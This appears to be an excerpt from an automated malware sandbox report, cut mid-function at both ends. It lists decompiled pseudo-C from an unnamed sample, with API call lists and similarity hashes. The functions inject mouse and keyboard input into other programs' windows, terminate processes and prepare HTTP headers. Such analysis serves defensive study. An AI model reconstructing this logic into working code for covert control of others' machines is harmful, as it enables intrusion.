    									E004193CE( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
    									E004119C1( *(_t186 + 0x14));
    									E004119C1( *((intOrPtr*)(_t186 + 4)));
    									_t149 = E00411E1F(_v76, _v80);
    									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
    									_t38 = _t186 + 0x18;
    									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
    									__eflags =  *_t38;
    									 *((intOrPtr*)(_t186 + 4)) = _t149;
    									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
    									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
    									 *((intOrPtr*)(_t207 + 0x14)) = E004168E8(E004168E8(E00416964(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
    								} else {
    									E004193CE( *((intOrPtr*)(_t207 + 0x60)), _v20);
    								}
    							}
    							__eflags = _v84 & 0x00000004;
    							if((_v84 & 0x00000004) == 0) {
    								L27:
    								__eflags = _v92;
    								if(_v92 == 0) {
    									goto L37;
    								}
    								E00419364( &_v76);
    								_t70 = _t186 + 0x24;
    								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
    								__eflags =  *_t70;
    								 *(_t186 + 8) = _v80;
    								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
    								 *(_t186 + 0x20) = _v88;
    								 *(_t186 + 0x28) = _a12;
    								goto L29;
    							}
    							_t202 = _v92;
    							__eflags = _t202;
    							if(__eflags != 0) {
    								_t136 = _v88;
    							} else {
    								_t202 = _a8;
    								_t136 = _a12;
    							}
    							_v84 = _t136;
    							_v104 = E00407758(_v84, __eflags, _t202, _v40, _v36,  &_v92);
    							E004119C1( *((intOrPtr*)(_t207 + 0x44)));
    							__eflags = _v108;
    							if(_v108 != 0) {
    								__eflags = _t202 - _a8;
    								if(_t202 != _a8) {
    									E004119C1(_t202);
    								}
    							} else {
    								__eflags = _t202 - _a8;
    								if(_t202 == _a8) {
    									goto L37;
    								}
    								_v92 = _t202;
    								_v88 = _v84;
    							}
    							goto L27;
    						} else {
    							E00419364( &_v76);
    							LeaveCriticalSection(0x422a08);
    							_t111 =  *0x422a04(0xffffe8a3, 0) | 0xffffffff;
    							goto L10;
    						}
    					} else {
    						E00407042(_v84);
    						E00419364( &_v76);
    						goto L8;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • EnterCriticalSection.KERNEL32(00422A08), ref: 00407F27
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00407F85
    • LeaveCriticalSection.KERNEL32(00422A08,?), ref: 00407FCC
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00408137
    • EnterCriticalSection.KERNEL32(00422A08), ref: 00408156
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 004081B8
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 004081E1
    • EnterCriticalSection.KERNEL32(00422A08), ref: 00408200
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00408248
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
    • String ID: Accept-Encoding$If-Modified-Since$identity
    • API String ID: 3286975823-3034467039
    • Opcode ID: bcbe074c28fad4e9d2dd28ed65851ddbd9ebfe4c33012aa10da685d21189c5b8
    • Instruction ID: 91166bddecff6f5d4a971145e9441aa1d12e903237d3667f1a8718abe336678b
    • Opcode Fuzzy Hash: bcbe074c28fad4e9d2dd28ed65851ddbd9ebfe4c33012aa10da685d21189c5b8
    • Instruction Fuzzy Hash: 14A16E71504701AFCB10DF24D945A5EBBE4BF88314F104A2EF895B72E1CB38E955CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0041AC8B(void* __eax, unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				int _v28;
    				signed short _t39;
    				int _t48;
    				BYTE* _t49;
    				signed short _t53;
    				int _t65;
    				int _t66;
    				unsigned int _t67;
    				struct HMENU__* _t72;
    				struct HMENU__* _t76;
    				void* _t85;
    
    				_t67 = __ecx;
    				_t39 = _a8;
    				_t85 = _t39 - 0xfffffffd;
    				if(_t85 == 0) {
    					SetKeyboardState( *0x423e88);
    				} else {
    					if(_t85 <= 0 || _t39 > 0xffffffff) {
    						_v20.top = _t39 >> 0x10;
    						_v20.right = _t67 & 0x0000ffff;
    						_v20.left = _t39 & 0x0000ffff;
    						_v20.bottom = _t67 >> 0x10;
    						E0040BC64( &_v20, _t67 >> 0x10, _t39 & 0x0000ffff, 0x423e78, _a4, 0);
    					} else {
    						_t72 = GetMenu(_a4);
    						if(_t72 != 0) {
    							_v24 = _v24 | 0xffffffff;
    							_t48 = GetMenuItemCount(_t72);
    							_t65 = 0;
    							_v28 = _t48;
    							if(_t48 > 0) {
    								do {
    									if(GetMenuState(_t72, _t65, 0x400) < 0) {
    										HiliteMenuItem(_a4, _t72, _t65, 0x400);
    										_v24 = _t65;
    									}
    									_t65 = _t65 + 1;
    								} while (_t65 < _v28);
    							}
    							_t49 =  *0x423e88;
    							_push(_t49[0x104]);
    							_t66 = MenuItemFromPoint(_a4, _t72, _t49[0x100]);
    							if(_t66 != 0xffffffff) {
    								_v28 = GetMenuState(_t72, _t66, 0x400);
    								if(_v24 != _t66) {
    									EndMenu();
    								}
    								HiliteMenuItem(_a4, _t72, _t66, 0x480);
    								if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    									if((_v28 & 0x00000010) == 0) {
    										if((_v28 & 0x00000800) == 0) {
    											_t53 = GetMenuItemID(_t72, _t66);
    											if(_t53 != 0xffffffff) {
    												goto L21;
    											}
    										} else {
    											_t53 = 0;
    											L21:
    											SendMessageW(_a4, 0x111, _t53 & 0x0000ffff, 0);
    										}
    									} else {
    										_t76 = GetSubMenu(_t72, _t66);
    										if(_t76 != 0 && GetMenuItemRect(_a4, _t72, _t66,  &_v20) != 0) {
    											TrackPopupMenuEx(_t76, 0x4000, _v20, _v20.bottom, _a4, 0);
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				SetEvent( *0x423e84);
    				return 0;
    			}

    APIs
    • GetMenu.USER32(?), ref: 0041ACB7
    • GetMenuItemCount.USER32 ref: 0041ACCD
    • GetMenuState.USER32 ref: 0041ACE5
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0041ACF5
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0041AD1B
    • GetMenuState.USER32 ref: 0041AD2F
    • EndMenu.USER32 ref: 0041AD3F
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0041AD4F
    • GetSubMenu.USER32 ref: 0041AD73
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0041AD8D
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041ADAE
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 0041ADDF
    • SetKeyboardState.USER32 ref: 0041AE1E
    • SetEvent.KERNEL32 ref: 0041AE2A
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: 0b9e565d704197867e07e76a02212cfc6048368f63c1b9b3694d9a2df468041c
    • Instruction ID: a0e7fb7c48291ef0dbad541822e4ca7d423d2952a92883a3a883671260c97e52
    • Opcode Fuzzy Hash: 0b9e565d704197867e07e76a02212cfc6048368f63c1b9b3694d9a2df468041c
    • Instruction Fuzzy Hash: 2C31C131101305AFD7215F64DD88AEB7FF8EB45765F00422AF964A11B1C7348DA5CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A9C1(void** __eax, char _a4) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __eax;
    				_t15 =  *(__eax + 0x1c);
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t16 = _t41[3];
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t17 = _t41[1];
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t18 = _t41[5];
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t19 = _t41[4];
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t21 = _t41[0x56];
    					if(_t21 != 0) {
    						SelectObject(_t41[0x55], _t21);
    					}
    					_t22 = _t41[0x57];
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t23 = _t41[0x55];
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t24 = _t41[0x58];
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t25 = _t41[0x60];
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
    					}
    					_t20 = E004133D0( &(_t41[0x5f]));
    				}
    				return _t20;
    			}

    APIs
    • DeleteObject.GDI32(?), ref: 0041A9D4
    • CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9E4
    • TlsFree.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9EF
    • CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041A9FD
    • UnmapViewOfFile.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA07
    • CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA14
    • SelectObject.GDI32(?,?), ref: 0041AA2E
    • DeleteObject.GDI32(?), ref: 0041AA3F
    • DeleteDC.GDI32(?), ref: 0041AA4C
    • CloseHandle.KERNEL32(?,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA5D
    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0041AA6C
    • PostThreadMessageW.USER32 ref: 0041AA85
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: 04f97648425f402a3d8a3a65ee34058552988615054ced53ea4d21971d3d7671
    • Instruction ID: 84cc935ca9ff9b43167a6365ca12082fbb38715edf6fc36869ca495fc9edda93
    • Opcode Fuzzy Hash: 04f97648425f402a3d8a3a65ee34058552988615054ced53ea4d21971d3d7671
    • Instruction Fuzzy Hash: 24210970701701ABD7209B799E48B97B3ECAF44781F04492AB955E36A0DB38E890CA69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C445(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				long _v12;
    				signed char _v16;
    				struct tagRECT _v32;
    				char _v140;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				intOrPtr _t52;
    				void* _t85;
    				RECT* _t89;
    
    				_t89 = __edi;
    				_t86 = __ecx;
    				_t85 = __eax;
    				_t47 = E0041A6EF(_a4) & 0x0000ffff;
    				_v16 = _t47;
    				if((_t47 & 0x00000001) != 0) {
    					L16:
    					return 1;
    				}
    				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
    					_v5 = 0;
    				} else {
    					_t86 =  &_v140;
    					E0041601A( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
    					_v5 = E004151A4( &_v140);
    				}
    				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
    					L8:
    					if(E0040C2E3(_t85, _t86) == 0) {
    						L14:
    						_t52 = _a8;
    						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
    							IntersectRect( &_v32, _t52 + 4, _t89);
    							FillRect( *(_t85 + 0x154),  &_v32, 6);
    							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
    						}
    						goto L16;
    					}
    					E004119FD( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
    					ResetEvent( *(_t85 + 0xc));
    					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
    						goto L14;
    					}
    					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
    						TerminateProcess( *(_t85 + 0x17c), 0);
    						E004133D0(_t85 + 0x17c);
    						goto L14;
    					}
    					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
    						goto L14;
    					}
    					return _v5;
    				} else {
    					ResetEvent( *(_t85 + 0xc));
    					_t86 = _t89->left & 0x0000ffff;
    					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
    						goto L8;
    					} else {
    						goto L16;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041A6EF: GetClassNameW.USER32 ref: 0041A70A
    • GetWindowThreadProcessId.USER32(?,?), ref: 0040C46F
    • ResetEvent.KERNEL32(00000010), ref: 0040C4BE
    • PostMessageW.USER32(?,?,?,00000010), ref: 0040C4E1
    • WaitForSingleObject.KERNEL32(00000010,00000064), ref: 0040C4F0
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040C51B
    • PostThreadMessageW.USER32 ref: 0040C52B
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040C53D
      • Part of subcall function 0041601A: StringFromGUID2.OLE32(00000000,?,00000028,00406347,?,00000010,00000000,77A19EB0), ref: 004160BB
      • Part of subcall function 004151A4: OpenMutexW.KERNEL32(00100000,00000000,00000000,00406CC8,?,19367401,?,00000001,8889347B,00000002), ref: 004151AF
      • Part of subcall function 004151A4: CloseHandle.KERNEL32(00000000), ref: 004151BA
    • TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 0040C562
      • Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133DF
      • Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133E8
    • IntersectRect.USER32 ref: 0040C582
    • FillRect.USER32 ref: 0040C594
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040C5A8
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 2453266691-0
    • Opcode ID: 80f214f17c96279082b7044dfe39ae44752b8f98dafe1ada3c3de525ae8936bc
    • Instruction ID: e400f066a3bc26016dbcda979542cf9c5c09c6bd8c548c9ac4e964899fa1dc48
    • Opcode Fuzzy Hash: 80f214f17c96279082b7044dfe39ae44752b8f98dafe1ada3c3de525ae8936bc
    • Instruction Fuzzy Hash: 24419E30500219FBEF119FA0CD85BEA7BB8AF04704F048176F944EA1A1DB79D955DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E0040874C(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				struct HWND__* _v8;
    				char _v12;
    				struct HWND__* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed char _v32;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v92;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t107;
    				struct HWND__* _t108;
    				int _t113;
    				int _t114;
    				signed char _t143;
    				struct HWND__* _t144;
    				long _t147;
    				struct HWND__* _t170;
    				long _t171;
    				void* _t174;
    
    				_t174 = __eax;
    				_t107 =  *((intOrPtr*)(__eax + 0x10));
    				_v16 = 0;
    				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
    					_t108 =  *((intOrPtr*)(_t107 + 0x108));
    					_v16 = _t108;
    					if(_t108 != 0) {
    						_v32 = E0041AA9C(0, __eax, 0) & 0x0000ffff;
    					} else {
    						_v32 = 0;
    					}
    				} else {
    					if((_a4 & 0x00000001) != 0) {
    						E004082BE(_a12, _a8, __eax);
    						_a4 = _a4 & 0xfffffffe;
    					}
    					if((_a4 & 0x00000004) != 0) {
    						E0040824F(0, _t174, 0, 0, 1);
    					}
    				}
    				_t143 = _a4;
    				 *( *(_t174 + 0x10) + 0x100) = _a8;
    				_t113 =  *(_t174 + 0x10);
    				 *(_t113 + 0x104) = _a12;
    				if(_t143 == 0) {
    					L69:
    					return _t113;
    				}
    				_v20 = _t143;
    				_t26 =  &_v20;
    				 *_t26 = _v20 & 0x00000002;
    				if( *_t26 == 0) {
    					if((_t143 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					E0041AA9C(1, _t174);
    					L14:
    					_v24 = _t143;
    					_t31 =  &_v24;
    					 *_t31 = _v24 & 0x00000020;
    					if( *_t31 == 0) {
    						if((_t143 & 0x00000040) == 0) {
    							L19:
    							_v28 = _t143;
    							_t36 =  &_v28;
    							 *_t36 = _v28 & 0x00000008;
    							if( *_t36 == 0) {
    								if((_t143 & 0x00000010) == 0) {
    									L24:
    									_t114 =  *(_t174 + 0x10);
    									_push( *((intOrPtr*)(_t114 + 0x104)));
    									_push( *((intOrPtr*)(_t114 + 0x100)));
    									0xc00000 = 0x64;
    									_t170 = E004160F6(0xc00000,  &_v12);
    									_t113 = _v12 + 0xfffffff6;
    									_v8 = _t170;
    									if(_t113 <= 7) {
    										_t113 = GetWindowLongW(_t170, 0xfffffff0);
    										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
    											_t113 = GetParent(_t170);
    											if(_t113 != 0) {
    												_v8 = _t113;
    												_t170 = _t113;
    											}
    										}
    									}
    									if(_t170 == 0) {
    										L35:
    										_t144 = _v16;
    										if(_t144 != 0) {
    											_t113 = IsWindow(_t144);
    											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
    												if(_a4 != 0x8001) {
    													_t113 = E0040824F(0, _t174, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t144;
    												_v12 = 1;
    												_t170 = _t144;
    											}
    										}
    										goto L43;
    									} else {
    										_t113 = E0041A6EF(_t170);
    										if((_t113 & 0x00000040) == 0) {
    											goto L35;
    										}
    										if(_t170 != _v16) {
    											_t113 = E0040824F(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
    										}
    										_v12 = 1;
    										L43:
    										if(_t170 == 0) {
    											goto L69;
    										}
    										_v92.cbSize = 0x3c;
    										_t113 = GetWindowInfo(_t170,  &_v92);
    										if(_t113 == 0) {
    											goto L69;
    										}
    										_t113 = _a8 & 0x0000ffff;
    										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
    										if(_v12 != 1) {
    											_t171 = _a4;
    										} else {
    											_t113 = E0041A6EF(_t170);
    											if((_t113 & 0x00000020) == 0) {
    												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
    												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
    											} else {
    												_t171 = _t147;
    											}
    										}
    										if(_v20 == 0) {
    											if((_a4 & 0x00000004) == 0) {
    												goto L55;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa2);
    											_push(0x202);
    											goto L54;
    										} else {
    											_push(_t147);
    											_push(_t171);
    											_push(0xa1);
    											_push(0x201);
    											L54:
    											_push(_v12);
    											_push( &_v92);
    											_push(_v8);
    											_t113 = E004084BE(_t174, 0xc00000);
    											L55:
    											if(_v24 == 0) {
    												if((_a4 & 0x00000040) == 0) {
    													L60:
    													if(_v28 == 0) {
    														if((_a4 & 0x00000010) == 0) {
    															L65:
    															if((_a4 & 0x00000001) != 0) {
    																_t113 = E004084BE(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
    															}
    															if((_a4 & 0x00000800) != 0) {
    																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0041AA9C(0, _t174, 0) & 0x0000ffff, _t147);
    															}
    															goto L69;
    														}
    														_push(_t147);
    														_push(_t171);
    														_push(0xa5);
    														_push(0x205);
    														L64:
    														_push(_v12);
    														_push( &_v92);
    														_push(_v8);
    														_t113 = E004084BE(_t174, 0xc00000);
    														goto L65;
    													}
    													_push(_t147);
    													_push(_t171);
    													_push(0xa4);
    													_push(0x204);
    													goto L64;
    												}
    												_push(_t147);
    												_push(_t171);
    												_push(0xa8);
    												_push(0x208);
    												L59:
    												_push(_v12);
    												_push( &_v92);
    												_push(_v8);
    												_t113 = E004084BE(_t174, 0xc00000);
    												goto L60;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa7);
    											_push(0x207);
    											goto L59;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								E0041AA9C(2, _t174);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						E0041AA9C(4, _t174);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00408858
    • GetParent.USER32(00000000), ref: 0040887A
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040889F
    • IsWindow.USER32(?), ref: 004088C2
      • Part of subcall function 004082BE: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004082D2
      • Part of subcall function 004082BE: ReleaseMutex.KERNEL32(?), ref: 004082F1
      • Part of subcall function 004082BE: GetWindowRect.USER32 ref: 004082FE
      • Part of subcall function 004082BE: IsRectEmpty.USER32(?), ref: 00408382
      • Part of subcall function 004082BE: GetWindowLongW.USER32(?,000000F0), ref: 00408391
      • Part of subcall function 004082BE: GetParent.USER32(?), ref: 004083A7
      • Part of subcall function 004082BE: MapWindowPoints.USER32 ref: 004083B0
      • Part of subcall function 004082BE: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 004083D4
    • GetWindowInfo.USER32 ref: 00408912
    • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00408A4F
      • Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
      • Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
      • Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
      • Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: 0d7f2221200d5aa56f64da65c4c9b4289fcba6bb0e3daf6430743b1c7ae4a4f4
    • Instruction ID: 6e072116e04ae3ac8edeaf957ab24f678ffcc714c1e7b99c093d121092c89006
    • Opcode Fuzzy Hash: 0d7f2221200d5aa56f64da65c4c9b4289fcba6bb0e3daf6430743b1c7ae4a4f4
    • Instruction Fuzzy Hash: 8991A271600309AADB11AF55CE85BFF7BB5AB80744F14803EF9807A2D1CBBC8981DB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0040B3B9(WCHAR* __ecx, signed char* _a4) {
    				char _v514;
    				signed short _v836;
    				signed short _v928;
    				char _v964;
    				char _v1228;
    				short _v1748;
    				short _v1752;
    				intOrPtr _v1756;
    				signed char* _v1760;
    				signed int _v1764;
    				char* _v1768;
    				void* _v1772;
    				intOrPtr _v1776;
    				intOrPtr _v1780;
    				char _v1784;
    				intOrPtr _v1788;
    				signed int _v1792;
    				signed int _v1796;
    				void* _v1797;
    				signed int _v1800;
    				void* __ebx;
    				void* __esi;
    				signed int _t60;
    				void* _t61;
    				signed int _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t80;
    				signed int _t83;
    				long _t84;
    				long _t85;
    				signed int _t89;
    				signed int _t101;
    				signed int _t108;
    				signed int _t110;
    				WCHAR* _t123;
    				signed char _t125;
    				signed char* _t131;
    				signed int _t134;
    				void* _t136;
    				void* _t140;
    				signed int _t141;
    
    				_t128 = __ecx;
    				_t131 = _a4;
    				_t60 = E0040634D(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
    				_v1796 = _t60;
    				if(_t60 != 0) {
    					_t61 =  *0x4229f4; // 0x0
    					_v1772 = _t61;
    					_v1768 =  &_v1228;
    					_v1780 = E0040B215;
    					_v1776 = E0040B351;
    					_v1760 = _t131;
    					E004065EC( &_v964);
    					E004119FD( &_v1228,  &_v514, 0x102);
    					_t69 =  *_t131 & 0x000000ff;
    					__eflags = _t69;
    					if(_t69 == 0) {
    						_t71 = _v928 >> 0x10;
    						__eflags = _t71;
    						_v1796 = _t71;
    						_t72 = _v928 & 0x0000ffff;
    						goto L7;
    					} else {
    						__eflags = _t69 == 1;
    						if(_t69 == 1) {
    							_v1796 = _v836 >> 0x10;
    							_t72 = _v836 & 0x0000ffff;
    							L7:
    							_v1792 = _t72;
    						}
    					}
    					_v1796 = _v1796 * 0xea60;
    					_v1792 = _v1792 * 0xea60;
    					E00411A74( &_v964,  &_v964, 0, 0x3c0);
    					_v1760 = 0;
    					_t80 = E00406473();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						do {
    							__eflags =  *_t131;
    							_v1797 = 1;
    							if( *_t131 != 0) {
    								L24:
    								_t83 = E004056FB();
    								_t138 = _t83;
    								__eflags = _t83;
    								if(__eflags == 0) {
    									goto L29;
    								} else {
    									_v1796 = E0041752D(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
    									E004119C1(_t138);
    									__eflags = _v1800;
    									if(_v1800 == 0) {
    										_t131 = _a4;
    										goto L33;
    									} else {
    										_v1764 = _v1764 & 0;
    										_t108 = E0040AFD9(_t128, _t129,  &_v1764, 1);
    										_t131 = _a4;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L33:
    											_t125 = _v1797;
    										} else {
    											_t131[8] = _t131[8] | 0xffffffff;
    											_t110 = E0040B7D6( &_v1784);
    											__eflags = _t110;
    											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
    											E0041795A( &(_t131[8]));
    											E004119C1(_v1764);
    										}
    									}
    									E004119C1(_v1784);
    									__eflags = _t125 - 2;
    									if(_t125 != 2) {
    										__eflags = _t125;
    										if(_t125 != 0) {
    											goto L29;
    										} else {
    											_t84 = _v1796;
    										}
    									} else {
    										_t84 = _v1792;
    									}
    								}
    							} else {
    								asm("sbb ebx, ebx");
    								E0040AE98( !( ~(_v1748 & 0x0000ffff)) &  &_v1748, _t128, 0);
    								_t123 =  &(_t131[0x122]);
    								_t89 = GetFileAttributesW( &_v1752);
    								__eflags = _t89 - 0xffffffff;
    								if(_t89 == 0xffffffff) {
    									_t89 = GetFileAttributesW(0x422a70);
    									__eflags = _t89 - 0xffffffff;
    									if(_t89 == 0xffffffff) {
    										goto L29;
    									} else {
